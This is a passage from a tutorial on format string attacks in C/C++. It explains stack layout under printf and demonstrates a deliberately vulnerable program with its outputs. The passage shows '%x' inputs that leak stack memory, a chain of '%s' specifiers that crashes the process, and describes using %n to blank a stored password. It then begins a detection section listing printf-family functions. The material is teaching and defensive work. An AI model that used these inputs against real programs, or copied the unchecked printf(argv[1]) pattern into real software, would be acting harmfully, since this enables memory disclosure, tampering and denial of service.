<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once the parameter is pushed onto the stack and call instruction is processed, the stack looks like the following.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 580px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 164px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 23px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.75pt; border-color: initial; border-left-width: 0.75pt; border-right-width: 0.75pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
……..</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="bottom"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Caller Local Variables</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 29px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of sVal</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 31px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of “%s”</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Return Address</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 32px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Printf() Variable</div>
</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> method uses the first parameter to interpret what it sees on the stack. Therefore, the content referenced by one stack parameter can dictate the number of parameters, and whether each parameter is interpreted as values or reference. On the other hand, the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function expects the stack diagram without being specifiers as following;</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 580px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 164px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 23px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.75pt; border-color: initial; border-left-width: 0.75pt; border-right-width: 0.75pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
……..</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="bottom"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Caller Local Variables</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 29px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of sVal</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Return Address</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 32px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Printf() Variable</div>
</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here, the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sVal</em> buffer is the first parameter to <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, so it will be interpreted as a format by the function. When an untrustworthy input data specifies format string specifiers, the coder would not have indeed anticipated it as part of the input in <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sVal</em> buffer. Therefore, the attacker could manipulate the stack by his own choice, could get the desired data to the top of the stack by removing value off the stack using the essential format string specifiers. If the hacker somehow knows the correct offset to where something interesting is on the stack, he can compute the indispensable number of percentages and other format specifiers to inject to have the value referenced appear in the output.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">EXPLOITATION IN ACTION</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The C/C++ language is mostly prone to format string attack whereas other modern languages like C#, Java won’t typically allow the execution of arbitrary code. In fact, C/C++’s internal design makes it harder to detect format string problems which include some especially dangerous commands that do not exist in some other languages’ format string languages. A successful attack can lead immediately to the execution of arbitrary code, and to information disclosure. The format string is actually defined using a limited data processing language that’s streamline output formats. Unfortunately, many programmers committed a subtle mistake while coding. They typically, exhaust data from untrusted source as the format string and intruders write unsolicited format strings to cause serious harms.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The sole issue in C/C++ language in context of this bug is that, function can be by specifying an ellipsis (…) as the last argument stated to take number of arguments which being called without knowing how many arguments are being passed in even at run time. Hence, let’s have a look at the following simple C++ code snippet which simply displaying strings value by accepting it from command line.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Program: FSA.CPP</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> #include <stdio.h>
void main(int argc, char* argv[])
{
if( argc != 2 )
{
printf("Enter the command Argument\n");
}
if(argc > 1)
{
printf(argv[1]);
}
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
At first glance, the previously mentioned codes look fairly simple but the programmer isn’t aware of the inherent format string bug in this code, since the Printf method is without specifiers. Let’s observe the sample vulnerable program. Although we have supplied the format string, we haven’t supplied the command variable to be substituted into the string. Interestingly, <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> doesn’t fail, instead producing bizarre output that looks like this:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe Hello%x%x
hello350ffda
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you open this FSA.EXE in any hex editor like WinHex, you will observer the same memory stack sequence as the prior sample yielding using %x .Moreover, using multiple %x specifiers we can penetrate the inner stack, and the result can be the exposure of sensitive data in memory including passwords, encryption keys, etc.</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe "%x %x %x %x"
350 ffce 158 2
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Another more interesting specifier is %n which modifies values in memory in order to change the default behavior of the program. For example, a program might store a password for some administrative feature in memory. Hence, that password can be null-terminated using the %n specifier, which would allow access to that administrative feature with a blank password too.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Format string attacks typically use the %x and %n specifiers in particular. However, the others can be used to crash either the machine or advance through the stack. What is truly happening in the preceding demonstration, when the number of actual arguments does not correspond to the number of tokens in the format string, the output includes various bits of the stack. The following figure shows the reading of four values from the stack and prints them in abusive manner as;</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/051915_1101_FORMATSTRIN1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Figure : Stack after exploitation</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The format string bug is also capable of causing denial of service attack via a malicious user forcing the process to crash. It is relatively easy to cause a program to crash with malicious format specifiers especially %s (NULL terminating string) and %n. In case of supplying a malicious format string containing either of these format specifiers, and no valid memory address exists, where the corresponding variable should be, then the process will succumb to attempting to dereference the stack, which causes a denial of service.</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
On the other hand, if a large number of “%d” is specified, then an instruction might read from illegal addresses, which are not mapped. This in turn will result in a denial of service attack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Moreover, the %s format parameter can be used to read from the memory address and subsequently, retrieve the address and print the desired value. The %x and %d retrieve the double word from the stack and print them in hexadecimal or decimal notation. At the end, the specifier %c, obtains the paired double word from the stack then converts it into the single byte of type character and finally displays it as a character.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">BUG DETECTION ANALYSIS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
There are several approaches to detect the format string loophole, which is typically bound to format family functions. Format functions are used to specify the format of output. They can perform conversion so that data types in C are converted into printable form. Perhaps the most efficient way is through rigorous code reviewing because programmer looks for all of the aspects where format string specifiers are used. First, there is list of functions in C/C++ programming that do not have a fixed list of arguments. Instead, they practice special ANSI C standard method to access arguments on the stack, no matter how many arguments there are presented as.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Table 1: </span>The printf() Family of Functions</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 0px 0px 5pt; padding: 0px; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 573px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 124px;"></col><col style="box-sizing: border-box; width: 123px;"></col><col style="box-sizing: border-box; width: 123px;"></col><col style="box-sizing: border-box; width: 124px;"></col><col style="box-sizing: border-box; width: 123px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border: 0.5pt solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Printf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Scanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vfprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cscanf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Wprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Sscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vfwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cwprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Wscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Swsscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vsprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cwscanf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sctprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_tprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sntprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_ftscanf</td></tr>
